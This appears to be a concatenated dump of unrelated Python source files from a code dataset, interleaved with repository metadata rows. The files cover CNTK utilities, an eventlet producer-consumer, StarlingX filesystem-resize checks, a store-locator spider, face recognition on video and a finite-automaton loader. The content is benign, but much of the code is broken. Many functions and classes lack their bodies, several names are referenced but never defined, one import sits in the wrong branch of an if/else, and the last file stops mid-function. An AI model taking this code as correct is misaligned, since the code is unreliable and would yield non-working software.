return copy.copy(trainer.previous_minibatch_loss_average)
def get_train_eval_criterion(trainer):
'''
Fetch the train evaluation criterion (e.g., classification error) from the last minibatch and copy it to the CPU in case it is on the GPU.
Args:
trainer (:class:`Trainer`): the trainer used.
Returns:
the criterion value
'''
# we copy the value so swig does not destroy it when we leave the scope
return copy.copy(trainer.previous_minibatch_evaluation_average)
# Obsolete: All usages should be replaced with the variable_value_to_seq
# procedure below
def value_to_seq(value):
'''
Convert a Value to a sequence of NumPy arrays that have their masked
entries removed.
Args:
value (:class:`~cntk.core.Value`): Value as it is returned by Swig
Returns:
a list of NumPy arrays
'''
np_data = np.asarray(value)
mask = value.mask()
if mask:
mask = np.asarray(mask)
np_data = [seq[mask[idx] != cntk_py.MaskKind_Invalid]
for idx, seq in enumerate(np_data)]
return np_data
def variable_value_to_seq(value, variable):
'''
Convert a Value to a sequence of NumPy arrays that have their masked
entries removed.
Args:
value (:class:`~cntk.core.Value`): Value as it is returned by Swig
Returns:
a list of NumPy arrays
'''
mask = value.mask()
if mask:
value_sequences = value.unpack_variable_value(variable, True, cpu())
return [np.asarray(seq) for seq in value_sequences[0]]
else:
return np.asarray(value)
def eval(op, arguments=None, precision=None, device=None, backward_pass=False, expected_backward=None):
'''
It evaluates ``op`` on the data provided by the reader. This is useful
mainly to explore the operators and for convenient unit testing.
Args:
op (:class:`Function`): operation to evaluate
arguments: maps variables to their input data. The
interpretation depends on the input type:
* `dict`: keys are input variable or names, and values are the input data.
* any other type: if node has a unique input, ``arguments`` is mapped to this input.
For nodes with more than one input, only `dict` is allowed.
In both cases, every sample in the data will be interpreted
as a new sequence. To mark samples as continuations of the
previous sequence, specify ``arguments`` as `tuple`: the
first element will be used as ``arguments``, and the second one will
be used as a list of bools, denoting whether a sequence is a new
one (`True`) or a continuation of the previous one (`False`).
Data should be either NumPy arrays or a
:class:`~cntk.io.MinibatchData` instance.
seq_starts (list of bools or None): if None, every sequence is
treated as a new sequence. Otherwise, it is interpreted as a list of
Booleans that tell whether a sequence is a new sequence (`True`) or a
continuation of the sequence in the same slot of the previous
minibatch (`False`)
precision (str or None): precision being 'float32', 'float64', or
None, in which case it will be determined by inspecting the operator
(costly)
device (:class:`~cntk.device.DeviceDescriptor`, default None): device
this value should be put on
backward_pass (`bool`, optional): whether a backward pass is performed
expected_backward (`dict` or None): keys are variables for which to
compute a backward ouptut. By default (None) all entries from
'arguments' are used
Returns:
mapping of output variables to their values.
'''
if backward_pass:
state, forward_output = op.forward(arguments, op.outputs, op.outputs,
device=device)
if expected_backward is None:
expected_backward = arguments
root_gradients = {v: _ones_like(o, precision) for v, o in
forward_output.items()}
backward_output = op.backward(state, root_gradients, expected_backward)
return forward_output, backward_output
else:
state, forward_output = op.forward(
arguments, op.outputs, None, device=device)
return forward_output, None
def get_python_function_arguments(f):
'''
Helper to get the parameter names and annotations of a Python function.
'''
# Note that we only return non-optional arguments (we assume that any optional args are not specified).
# This allows to, e.g., accept max(a, b, *more, name='') as a binary function
import sys
if sys.version_info.major >= 3:
from inspect import getfullargspec
else:
param_specs = getfullargspec(f)
annotations = param_specs.annotations
arg_names = param_specs.args
defaults = param_specs.defaults # "if this tuple has n elements, they correspond to the last n elements listed in args"
if defaults:
arg_names = arg_names[:-len(defaults)] # we allow Function(functions with default arguments), but those args will always have default values since CNTK Functions do not support this
return (arg_names, annotations)
def map_function_arguments(params, params_dict, *args, **kwargs):
'''
Helper to determine the argument map for use with various call operations.
Returns a dictionary from parameters to whatever arguments are passed.
Accepted are both positional and keyword arguments.
This mimics Python's argument interpretation, except that keyword arguments are not optional.
This does not require the arguments to be Variables or Functions. It is also called by train_minibatch() and @Signature.
'''
# start with positional arguments
arg_map = dict(zip(params, args))
# now look up keyword arguments
if len(kwargs) != 0:
for name, arg in kwargs.items(): # keyword args are matched by name
if name not in params_dict:
raise TypeError("got an unexpected keyword argument '%s'" % name)
param = params_dict[name]
if param in arg_map:
raise SyntaxError("got multiple values for argument '%s'" % name)
arg_map[param] = arg # add kw argument to dict
assert len(arg_map) == len(params)
return arg_map
def Signature(*args, **kwargs):
'''
``@Signature`` is a decorator to implement the function-argument annotations in Python-2.7,
as needed by the ``@Function`` decorator.
This is only needed when you have not yet migrated to Python 3.x.
Note: Although this is aimed at enabling ``@Function`` syntax with type annotations
in Python 2.7, ``@Signature`` is independent of CNTK and can be used for any argument annotation.
Args:
*args: types of arguments of the function that this decorator is applied to, in the same order.
**kwargs: types of arguments with optional names, e.g. `x=Tensor[42]`. Use this second form for
longer argument lists.
Example::
# Python 3:
@Function
def f(x: Tensor[42]):
return sigmoid(x)
# Python 2.7:
@Function
@Signature(Tensor[42])
def f(x):
return sigmoid(x)
# note that this:
@Function
@Signature(x:int)
def sqr(x):
return x*x
# is identical to:
def sqr(x):
return x*x
sqr.__annotations__ = {'x': int}``
'''
# this function returns another function which is the actual decorator applied to the def:
return add_annotations
def start_profiler(dir='profiler', sync_gpu=True, reserve_mem=cntk_py.default_profiler_buffer_size):
'''
Start profiler to prepare performance statistics gathering. Note that
the profiler is not enabled after start
(`example
<https://github.com/Microsoft/CNTK/wiki/Performance-Profiler#for-python>`_).
Args:
dir: directory for profiler output
sync_gpu: whether profiler syncs CPU with GPU when timing
reserve_mem: size in byte for profiler memory reserved
'''
cntk_py.start_profiler(dir, sync_gpu, reserve_mem)
def stop_profiler():
'''
Stop profiler from gathering performance statistics and flush them to file
'''
cntk_py.stop_profiler()
def enable_profiler():
'''
Enable profiler to gather data. Note that in training_session, profiler would be enabled automatically after the first check point
'''
cntk_py.enable_profiler()
def disable_profiler():
'''
Disable profiler from gathering data.
'''
cntk_py.disable_profiler()
| 35.528868 | 189 | 0.651586 |
54b9d0d77aa935ba65cfcd82b3fdde8db5a12f2f | 1,457 | py | Python | data/data_utils.py | ivankreso/LDN | 76740ef77fcec851f8abc2380251a9491dc0cdc3 | [
"MIT"
] | 8 | 2020-03-28T15:42:39.000Z | 2021-07-26T17:40:59.000Z | data/data_utils.py | ivankreso/LDN | 76740ef77fcec851f8abc2380251a9491dc0cdc3 | [
"MIT"
] | 1 | 2021-08-19T08:52:19.000Z | 2021-08-19T08:52:19.000Z | data/data_utils.py | ivankreso/LDN | 76740ef77fcec851f8abc2380251a9491dc0cdc3 | [
"MIT"
] | 1 | 2021-12-06T08:05:59.000Z | 2021-12-06T08:05:59.000Z | import math
| 30.354167 | 90 | 0.680165 |
54bbf057df21a564d7a670875ca4d351e87df738 | 1,181 | py | Python | src/leetcode_932_beautiful_array.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_932_beautiful_array.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | src/leetcode_932_beautiful_array.py | sungho-joo/leetcode2github | ce7730ef40f6051df23681dd3c0e1e657abba620 | [
"MIT"
] | null | null | null | # @l2g 932 python3
# [932] Beautiful Array
# Difficulty: Medium
# https://leetcode.com/problems/beautiful-array
#
# An array nums of length n is beautiful if:
#
# nums is a permutation of the integers in the range [1, n].
# For every 0 <= i < j < n, there is no index k with i < k < j where 2 * nums[k] == nums[i] + nums[j].
#
# Given the integer n,return any beautiful array nums of length n.
# There will be at least one valid answer for the given n.
#
# Example 1:
# Input: n = 4
# Output: [2,1,4,3]
# Example 2:
# Input: n = 5
# Output: [3,1,2,5,4]
#
#
# Constraints:
#
# 1 <= n <= 1000
#
#
from typing import List
if __name__ == "__main__":
import os
import pytest
pytest.main([os.path.join("tests", "test_932.py")])
| 21.87037 | 102 | 0.556308 |
54bc320185cf4b126b5fbdb33a31e831a7364c2c | 1,209 | py | Python | objectModel/Python/tests/cdm/cdm_collection/cdm_collection_helper_functions.py | aaron-emde/CDM | 9472e9c7694821ac4a9bbe608557d2e65aabc73e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/cdm_collection/cdm_collection_helper_functions.py | aaron-emde/CDM | 9472e9c7694821ac4a9bbe608557d2e65aabc73e | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-05-11T23:57:12.000Z | 2021-08-04T05:03:05.000Z | objectModel/Python/tests/cdm/cdm_collection/cdm_collection_helper_functions.py | aaron-emde/CDM | 9472e9c7694821ac4a9bbe608557d2e65aabc73e | [
"CC-BY-4.0",
"MIT"
] | null | null | null | from cdm.objectmodel import CdmCorpusDefinition, CdmManifestDefinition
from cdm.storage import LocalAdapter
from cdm.enums import CdmObjectType
def generate_manifest(local_root_path: str) -> 'CdmManifestDefinition':
"""
Creates a manifest used for the tests.
"""
cdmCorpus = CdmCorpusDefinition()
cdmCorpus.storage.default_namespace = 'local'
adapter = LocalAdapter(root=local_root_path)
cdmCorpus.storage.mount('local', adapter)
# add cdm namespace
cdmCorpus.storage.mount('cdm', adapter)
manifest = CdmManifestDefinition(cdmCorpus.ctx, 'manifest')
manifest.folder_path = '/'
manifest.namespace = 'local'
return manifest
def create_document_for_entity(cdm_corpus: 'CdmCorpusDefinition', entity: 'CdmEntityDefinition', nameSpace: str = 'local'):
"""
For an entity, it creates a document that will contain the entity.
"""
cdm_folder_def = cdm_corpus.storage.fetch_root_folder(nameSpace)
entity_doc = cdm_corpus.ctx.corpus.make_object(CdmObjectType.DOCUMENT_DEF, '{}.cdm.json'.format(entity.entity_name), False)
cdm_folder_def.documents.append(entity_doc)
entity_doc.definitions.append(entity)
return entity_doc
| 35.558824 | 127 | 0.746071 |
54bc883a34e91f4283ceaf8207e99c37307465c6 | 894 | py | Python | asynchronous/py27/asynchronous/producer_consumer/async_eventlet.py | fs714/concurrency-example | fbff041804b9c46fb7f21ebbae22acff745c7b0c | [
"Apache-2.0"
] | null | null | null | asynchronous/py27/asynchronous/producer_consumer/async_eventlet.py | fs714/concurrency-example | fbff041804b9c46fb7f21ebbae22acff745c7b0c | [
"Apache-2.0"
] | null | null | null | asynchronous/py27/asynchronous/producer_consumer/async_eventlet.py | fs714/concurrency-example | fbff041804b9c46fb7f21ebbae22acff745c7b0c | [
"Apache-2.0"
] | 1 | 2020-03-10T15:47:05.000Z | 2020-03-10T15:47:05.000Z | import eventlet
from eventlet.green import urllib2
import logging
logging.basicConfig()
logger = logging.getLogger(__file__)
logger.setLevel(logging.DEBUG)
if __name__ == '__main__':
url = 'http://127.0.0.1/1'
num_consumers = 10
num_tasks = 100
task_queue = eventlet.Queue()
pool = eventlet.GreenPool()
for i in xrange(num_consumers):
pool.spawn(consumer, task_queue)
for i in xrange(num_tasks):
task_queue.put(Task(url))
logger.info('async_call finish loop ' + str(i))
task_queue.join()
| 21.285714 | 55 | 0.644295 |
54bcc1399279abf79ea8c42b52f38e4ad74979ae | 1,155 | py | Python | models.py | zhangjingqiang/qiang-tools | 73fcb896bfec14f1ed668a1ef81526d80c80082f | [
"MIT"
] | null | null | null | models.py | zhangjingqiang/qiang-tools | 73fcb896bfec14f1ed668a1ef81526d80c80082f | [
"MIT"
] | null | null | null | models.py | zhangjingqiang/qiang-tools | 73fcb896bfec14f1ed668a1ef81526d80c80082f | [
"MIT"
] | null | null | null | from flask.ext.login import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from app import db
class Tool(db.Model):
"""
Tools details.
"""
__tablename__ = 'tools'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String())
| 26.25 | 73 | 0.665801 |
54bd473259faa4301d10d34795bb5bf05e6048e5 | 32,426 | py | Python | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/controller_fs.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/controller_fs.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/controller_fs.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | [
"Apache-2.0"
] | null | null | null | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2013 UnitedStack Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2013-2018 Wind River Systems, Inc.
#
import jsonpatch
import pecan
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from sysinv.api.controllers.v1 import base
from sysinv.api.controllers.v1 import collection
from sysinv.api.controllers.v1 import link
from sysinv.api.controllers.v1 import types
from sysinv.api.controllers.v1 import utils
from sysinv.common import constants
from sysinv.common import exception
from sysinv.common import health
from sysinv.common import utils as cutils
from sysinv import objects
from sysinv.openstack.common import log
from sysinv.openstack.common.gettextutils import _
from fm_api import constants as fm_constants
from sysinv.common.storage_backend_conf import StorageBackendConfig
LOG = log.getLogger(__name__)
def _total_size_controller_multi_fs(controller_fs_new_list):
"""This function is called to verify file system capability on
controller with primary (initial) storage backend already configured
calling from initial config (config_controller stage) will result in
failure
"""
total_size = 0
for fs in controller_fs_new_list:
if fs.name == constants.FILESYSTEM_NAME_DATABASE:
total_size += (2 * fs.size)
else:
total_size += fs.size
return total_size
def _total_size_controller_fs(controller_fs_new, controller_fs_list):
"""This function is called to verify file system capability on
controller with primary (initial) storage backend already configured
calling from initial config (config_controller stage) will result in
failure
"""
total_size = 0
for fs in controller_fs_list:
size = fs['size']
if controller_fs_new and fs['name'] == controller_fs_new['name']:
size = controller_fs_new['size']
if fs['name'] == "database":
size = size * 2
total_size += size
LOG.info(
"_total_size_controller_fs total filesysem size %s" % total_size)
return total_size
def _check_relative_controller_multi_fs(controller_fs_new_list):
"""
This function verifies the relative controller_fs sizes.
:param controller_fs_new_list:
:return: None. Raise Client exception on failure.
"""
if cutils.is_virtual():
return
backup_gib_min = constants.BACKUP_OVERHEAD
for fs in controller_fs_new_list:
if fs.name == constants.FILESYSTEM_NAME_DATABASE:
database_gib = fs.size
backup_gib_min += fs.size
elif fs.name == constants.FILESYSTEM_NAME_CGCS:
cgcs_gib = fs.size
backup_gib_min += fs.size
elif fs.name == constants.FILESYSTEM_NAME_BACKUP:
backup_gib = fs.size
if backup_gib < backup_gib_min:
raise wsme.exc.ClientSideError(_("backup size of %d is "
"insufficient. "
"Minimum backup size of %d is "
"required based upon glance size %d "
"and database size %d. "
"Rejecting modification "
"request." %
(backup_gib,
backup_gib_min,
cgcs_gib,
database_gib
)))
def _check_relative_controller_fs(controller_fs_new, controller_fs_list):
"""
This function verifies the relative controller_fs sizes.
:param controller_fs_new:
:param controller_fs_list:
:return: None. Raise Client exception on failure.
"""
if cutils.is_virtual():
return
backup_gib = 0
database_gib = 0
cgcs_gib = 0
for fs in controller_fs_list:
if controller_fs_new and fs['name'] == controller_fs_new['name']:
fs['size'] = controller_fs_new['size']
if fs['name'] == "backup":
backup_gib = fs['size']
elif fs['name'] == constants.DRBD_CGCS:
cgcs_gib = fs['size']
elif fs['name'] == "database":
database_gib = fs['size']
if backup_gib == 0:
LOG.info(
"_check_relative_controller_fs backup filesystem not yet setup")
return
# Required mininum backup filesystem size
backup_gib_min = cgcs_gib + database_gib + constants.BACKUP_OVERHEAD
if backup_gib < backup_gib_min:
raise wsme.exc.ClientSideError(_("backup size of %d is "
"insufficient. "
"Minimum backup size of %d is "
"required based on upon "
"glance=%d and database=%d and "
"backup overhead of %d. "
"Rejecting modification "
"request." %
(backup_gib,
backup_gib_min,
cgcs_gib,
database_gib,
constants.BACKUP_OVERHEAD
)))
def _check_controller_state():
"""
This function verifies the administrative, operational, availability of
each controller.
"""
chosts = pecan.request.dbapi.ihost_get_by_personality(
constants.CONTROLLER)
for chost in chosts:
if (chost.administrative != constants.ADMIN_UNLOCKED or
chost.availability != constants.AVAILABILITY_AVAILABLE or
chost.operational != constants.OPERATIONAL_ENABLED):
# A node can become degraded due to not free space available in a FS
# and thus block the resize operation. If the only alarm that degrades
# a controller node is a filesystem alarm, we shouldn't block the resize
# as the resize itself will clear the degrade.
health_helper = health.Health(pecan.request.dbapi)
degrade_alarms = health_helper.get_alarms_degrade(
pecan.request.context,
alarm_ignore_list=[fm_constants.FM_ALARM_ID_FS_USAGE],
entity_instance_id_filter="controller-")
allowed_resize = False
if (not degrade_alarms and
chost.availability == constants.AVAILABILITY_DEGRADED):
allowed_resize = True
if not allowed_resize:
alarm_explanation = ""
if degrade_alarms:
alarm_explanation = "Check alarms with the following IDs: %s" % str(degrade_alarms)
raise wsme.exc.ClientSideError(
_("This operation requires controllers to be %s, %s, %s. "
"Current status is %s, %s, %s. %s." %
(constants.ADMIN_UNLOCKED, constants.OPERATIONAL_ENABLED,
constants.AVAILABILITY_AVAILABLE,
chost.administrative, chost.operational,
chost.availability, alarm_explanation)))
return True
def _get_controller_cgtsvg_limit():
"""Calculate space for controller fs
returns: cgtsvg_max_free_GiB
"""
cgtsvg0_free_mib = 0
cgtsvg1_free_mib = 0
cgtsvg_max_free_GiB = 0
chosts = pecan.request.dbapi.ihost_get_by_personality(
constants.CONTROLLER)
for chost in chosts:
if chost.hostname == constants.CONTROLLER_0_HOSTNAME:
ipvs = pecan.request.dbapi.ipv_get_by_ihost(chost.uuid)
for ipv in ipvs:
if (ipv.lvm_vg_name == constants.LVG_CGTS_VG and
ipv.pv_state != constants.PROVISIONED):
msg = _("Cannot resize filesystem. There are still "
"unprovisioned physical volumes on controller-0.")
raise wsme.exc.ClientSideError(msg)
ilvgs = pecan.request.dbapi.ilvg_get_by_ihost(chost.uuid)
for ilvg in ilvgs:
if (ilvg.lvm_vg_name == constants.LVG_CGTS_VG and
ilvg.lvm_vg_size and ilvg.lvm_vg_total_pe):
cgtsvg0_free_mib = (int(ilvg.lvm_vg_size) *
int(ilvg.lvm_vg_free_pe) / int(
ilvg.lvm_vg_total_pe)) / (1024 * 1024)
break
else:
ipvs = pecan.request.dbapi.ipv_get_by_ihost(chost.uuid)
for ipv in ipvs:
if (ipv.lvm_vg_name == constants.LVG_CGTS_VG and
ipv.pv_state != constants.PROVISIONED):
msg = _("Cannot resize filesystem. There are still "
"unprovisioned physical volumes on controller-1.")
raise wsme.exc.ClientSideError(msg)
ilvgs = pecan.request.dbapi.ilvg_get_by_ihost(chost.uuid)
for ilvg in ilvgs:
if (ilvg.lvm_vg_name == constants.LVG_CGTS_VG and
ilvg.lvm_vg_size and ilvg.lvm_vg_total_pe):
cgtsvg1_free_mib = (int(ilvg.lvm_vg_size) *
int(ilvg.lvm_vg_free_pe) / int(
ilvg.lvm_vg_total_pe)) / (1024 * 1024)
break
LOG.info("_get_controller_cgtsvg_limit cgtsvg0_free_mib=%s, "
"cgtsvg1_free_mib=%s" % (cgtsvg0_free_mib, cgtsvg1_free_mib))
if cgtsvg0_free_mib > 0 and cgtsvg1_free_mib > 0:
cgtsvg_max_free_GiB = min(cgtsvg0_free_mib, cgtsvg1_free_mib) / 1024
LOG.info("min of cgtsvg0_free_mib=%s and cgtsvg1_free_mib=%s is "
"cgtsvg_max_free_GiB=%s" %
(cgtsvg0_free_mib, cgtsvg1_free_mib, cgtsvg_max_free_GiB))
elif cgtsvg1_free_mib > 0:
cgtsvg_max_free_GiB = cgtsvg1_free_mib / 1024
else:
cgtsvg_max_free_GiB = cgtsvg0_free_mib / 1024
LOG.info("SYS_I filesystem limits cgtsvg0_free_mib=%s, "
"cgtsvg1_free_mib=%s, cgtsvg_max_free_GiB=%s"
% (cgtsvg0_free_mib, cgtsvg1_free_mib, cgtsvg_max_free_GiB))
return cgtsvg_max_free_GiB
def _check_controller_multi_fs_data(context, controller_fs_list_new,
modified_fs):
""" Check controller filesystem data and return growth
returns: cgtsvg_growth_gib
"""
cgtsvg_growth_gib = 0
# Check if we need img_conversions
img_conversion_required = False
lvdisplay_keys = [constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_DATABASE],
constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_CGCS],
constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_BACKUP],
constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_SCRATCH],
constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_GNOCCHI]]
# On primary region, img-conversions always exists in controller_fs DB table.
# On secondary region, if both glance and cinder are sharing from the primary
# region, img-conversions won't exist in controller_fs DB table. We already
# have semantic check not to allow img-conversions resizing.
if (StorageBackendConfig.has_backend(pecan.request.dbapi, constants.SB_TYPE_LVM) or
StorageBackendConfig.has_backend(pecan.request.dbapi, constants.SB_TYPE_CEPH)):
img_conversion_required = True
lvdisplay_keys.append(constants.FILESYSTEM_LV_DICT[constants.FILESYSTEM_NAME_IMG_CONVERSIONS])
if (constants.FILESYSTEM_NAME_IMG_CONVERSIONS in modified_fs and
not img_conversion_required):
raise wsme.exc.ClientSideError(
_("%s is not modifiable: no cinder backend is "
"currently configured.") % constants.FILESYSTEM_NAME_IMG_CONVERSIONS)
lvdisplay_dict = pecan.request.rpcapi.get_controllerfs_lv_sizes(context)
for key in lvdisplay_keys:
if not lvdisplay_dict.get(key, None):
raise wsme.exc.ClientSideError(_("Unable to determine the "
"current size of %s. "
"Rejecting modification "
"request." % key))
for fs in controller_fs_list_new:
lv = fs.logical_volume
if lvdisplay_dict.get(lv, None):
orig = int(float(lvdisplay_dict[lv]))
new = int(fs.size)
if fs.name == constants.FILESYSTEM_NAME_DATABASE:
orig = orig / 2
if orig > new:
raise wsme.exc.ClientSideError(_("'%s' must be at least: "
"%s" % (fs.name, orig)))
if fs.name == constants.FILESYSTEM_NAME_DATABASE:
cgtsvg_growth_gib += 2 * (new - orig)
else:
cgtsvg_growth_gib += (new - orig)
LOG.info("_check_controller_multi_fs_data cgtsvg_growth_gib=%s" %
cgtsvg_growth_gib)
return cgtsvg_growth_gib
LOCK_NAME = 'ControllerFsController'
| 40.481898 | 104 | 0.587923 |
54bd765684733907c0e0f4fdff1bc9c5e51272ef | 1,298 | py | Python | tests/test_label_smoothing_ce.py | waking95/easy-bert | 576678343c251a134748941d1aa5e3368786337e | [
"MIT"
] | 12 | 2021-12-15T06:08:28.000Z | 2022-03-25T06:27:38.000Z | tests/test_label_smoothing_ce.py | waking95/easy-bert | 576678343c251a134748941d1aa5e3368786337e | [
"MIT"
] | null | null | null | tests/test_label_smoothing_ce.py | waking95/easy-bert | 576678343c251a134748941d1aa5e3368786337e | [
"MIT"
] | 1 | 2022-02-10T02:59:51.000Z | 2022-02-10T02:59:51.000Z | import unittest
import torch
from easy_bert.losses.label_smoothing_loss import LabelSmoothingCrossEntropy
if __name__ == '__main__':
unittest.main()
| 36.055556 | 101 | 0.523112 |
54be3891db6fb2756f21aef061add0f576fa4d9b | 747 | py | Python | Algorithms/Sort/Merge Sort/src.py | NikhilCodes/DSA-Warehouse | f68c3c7c092dc624381e956b065f849d738b5359 | [
"MIT"
] | null | null | null | Algorithms/Sort/Merge Sort/src.py | NikhilCodes/DSA-Warehouse | f68c3c7c092dc624381e956b065f849d738b5359 | [
"MIT"
] | null | null | null | Algorithms/Sort/Merge Sort/src.py | NikhilCodes/DSA-Warehouse | f68c3c7c092dc624381e956b065f849d738b5359 | [
"MIT"
] | null | null | null | """
ALGORITHM : Merge Sort
WORST CASE => {
PERFORMANCE: O(n log(n))
SPACE: O(n)
}
"""
if __name__ == '__main__':
sorted_arr = merge_sort([8, 4, 2, 9, 1, 3])
print(sorted_arr)
| 20.189189 | 48 | 0.497992 |
54bf36b4e97ce13f93c4eda7288e2207a9d1c577 | 2,295 | py | Python | locations/spiders/dollarama.py | cmecklenborg/alltheplaces | e62b59fb0071b6e289c4622d368fdb203a28347e | [
"MIT"
] | null | null | null | locations/spiders/dollarama.py | cmecklenborg/alltheplaces | e62b59fb0071b6e289c4622d368fdb203a28347e | [
"MIT"
] | null | null | null | locations/spiders/dollarama.py | cmecklenborg/alltheplaces | e62b59fb0071b6e289c4622d368fdb203a28347e | [
"MIT"
] | null | null | null | import scrapy
from locations.items import GeojsonPointItem
from urllib.parse import urlencode
from scrapy.selector import Selector
from locations.hours import OpeningHours
Days = ["Su", "Mo", "Tu", "We", "Th", "Fr", "Sa"]
| 33.26087 | 83 | 0.547277 |
54c063aa9c40b1e765ddd298550866419dd317e0 | 4,614 | py | Python | faces/recognize_faces_video.py | rummens1337/vision-assignment | 8735e95224be702f1bb33066eef80f098b347b1f | [
"MIT"
] | null | null | null | faces/recognize_faces_video.py | rummens1337/vision-assignment | 8735e95224be702f1bb33066eef80f098b347b1f | [
"MIT"
] | null | null | null | faces/recognize_faces_video.py | rummens1337/vision-assignment | 8735e95224be702f1bb33066eef80f098b347b1f | [
"MIT"
] | 1 | 2020-01-06T09:55:35.000Z | 2020-01-06T09:55:35.000Z | # import the necessary packages
from imutils.video import VideoStream
import face_recognition
import imutils
import pickle
import time
import cv2
import os
# https://www.pyimagesearch.com/2018/06/18/face-recognition-with-opencv-python-and-deep-learning/
# https://www.pyimagesearch.com/2018/06/11/how-to-build-a-custom-face-recognition-dataset/
args = {}
# path to serialized db of facial encodings
args['encodings'] = os.path.join(os.path.dirname(__file__), 'encodings.pickle')
# path to output video
args['output'] = None
# whether or not to display output frame to screen
args['display'] = 1
# face detection model to use: either `hog` or `cnn`
args['detection_method'] = 'hog'
# load the known faces and embeddings
print("[INFO] loading encodings...")
data = pickle.loads(open(args["encodings"], "rb").read())
# initialize the video stream and pointer to output video file, then
# allow the camera sensor to warm up
print("[INFO] starting video stream...")
vs = VideoStream(src=0).start()
writer = None
time.sleep(2.0)
# loop over frames from the video file stream
while True:
# grab the frame from the threaded video stream
frame = vs.read()
# convert the input frame from BGR to RGB then resize it to have
# a width of 750px (to speedup processing)
rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
rgb = imutils.resize(frame, width=750)
r = frame.shape[1] / float(rgb.shape[1])
# detect the (x, y)-coordinates of the bounding boxes
# corresponding to each face in the input frame, then compute
# the facial embeddings for each face
boxes = face_recognition.face_locations(rgb,
model=args["detection_method"])
encodings = face_recognition.face_encodings(rgb, boxes)
names = []
# loop over the facial embeddings
for encoding in encodings:
# attempt to match each face in the input image to our known
# encodings
matches = face_recognition.compare_faces(data["encodings"],
encoding)
name = "Unknown"
# check to see if we have found a match
if True in matches:
# find the indexes of all matched faces then initialize a
# dictionary to count the total number of times each face
# was matched
matchedIdxs = [i for (i, b) in enumerate(matches) if b]
counts = {}
# loop over the matched indexes and maintain a count for
# each recognized face face
for i in matchedIdxs:
name = data["names"][i]
counts[name] = counts.get(name, 0) + 1
# determine the recognized face with the largest number
# of votes (note: in the event of an unlikely tie Python
# will select first entry in the dictionary)
name = max(counts, key=counts.get)
# update the list of names
names.append(name)
# loop over the recognized faces
for ((top, right, bottom, left), name) in zip(boxes, names):
# rescale the face coordinates
top = int(top * r)
right = int(right * r)
bottom = int(bottom * r)
left = int(left * r)
# draw the predicted face name on the image
cv2.rectangle(frame, (left, top), (right, bottom),
(0, 255, 0), 2)
y = top - 15 if top - 15 > 15 else top + 15
cv2.putText(frame, name, (left, y), cv2.FONT_HERSHEY_SIMPLEX,
0.75, (0, 255, 0), 2)
# if the video writer is None *AND* we are supposed to write
# the output video to disk initialize the writer
# if writer is None and args["output"] is not None:
# fourcc = cv2.VideoWriter_fourcc(*"MJPG")
# writer = cv2.VideoWriter(args["output"], fourcc, 20,
# (frame.shape[1], frame.shape[0]), True)
#
# # if the writer is not None, write the frame with recognized
# # faces to disk
# if writer is not None:
# writer.write(frame)
# check to see if we are supposed to display the output frame to
# the screen
if args["display"] > 0:
cv2.imshow("Frame", frame)
key = cv2.waitKey(1) & 0xFF
# if the `q` key was pressed, break from the loop
if key == ord("q"):
break
# do a bit of cleanup
cv2.destroyAllWindows()
vs.stop()
# check to see if the video writer point needs to be released
if writer is not None:
writer.release()
| 36.912 | 97 | 0.6114 |
54c067d1a064f439200439939a3af3a79e1fca5f | 3,298 | py | Python | pytint/machine_io.py | semicolonTransistor/PyTint | 0f70fe756c285cda38b3a91318af02382a505263 | [
"MIT"
] | 1 | 2020-08-14T19:41:45.000Z | 2020-08-14T19:41:45.000Z | pytint/machine_io.py | semicolonTransistor/PyTint | 0f70fe756c285cda38b3a91318af02382a505263 | [
"MIT"
] | null | null | null | pytint/machine_io.py | semicolonTransistor/PyTint | 0f70fe756c285cda38b3a91318af02382a505263 | [
"MIT"
] | null | null | null | from pytint.interpreters import FiniteAutomaton
from typing import List, Union, Dict, Iterable
import collections
import yaml
def load_machine(yaml_input: str, machine_type: str = "", name: str = ""):
# loads yaml from input
data = yaml.safe_load(yaml_input)
# if no type override, attempt to load type from data
if not machine_type:
if "type" in data:
machine_type = str(data["type"]).lower()
else:
# can't find machine type
raise IncompleteMachine("type", "machine")
if not name and "name" in data:
name = data["name"]
if "start" in data:
start = str(data["start"])
start
else:
raise IncompleteMachine("start", machine_type)
if machine_type == "dfa" or machine_type == "nfa":
machine = FiniteAutomaton(name)
machine.set_start_state(start)
if "accept-states" in data:
raw_accepted: Union[any, Iterable[any]] = data["accept-states"]
if isinstance(raw_accepted, str) or not isinstance(raw_accepted, collections.Iterable):
raw_accepted = [raw_accepted]
accepted: List[str] = list(map(lambda x: str(x), raw_accepted))
for accept_state in accepted:
machine.add_accepting_state(accept_state)
else:
raise IncompleteMachine("accept-states", machine_type)
if "transitions" in data:
for transition in data["transitions"]:
if len(transition) < 3:
raise Exception("Transitions are 3-tuples!")
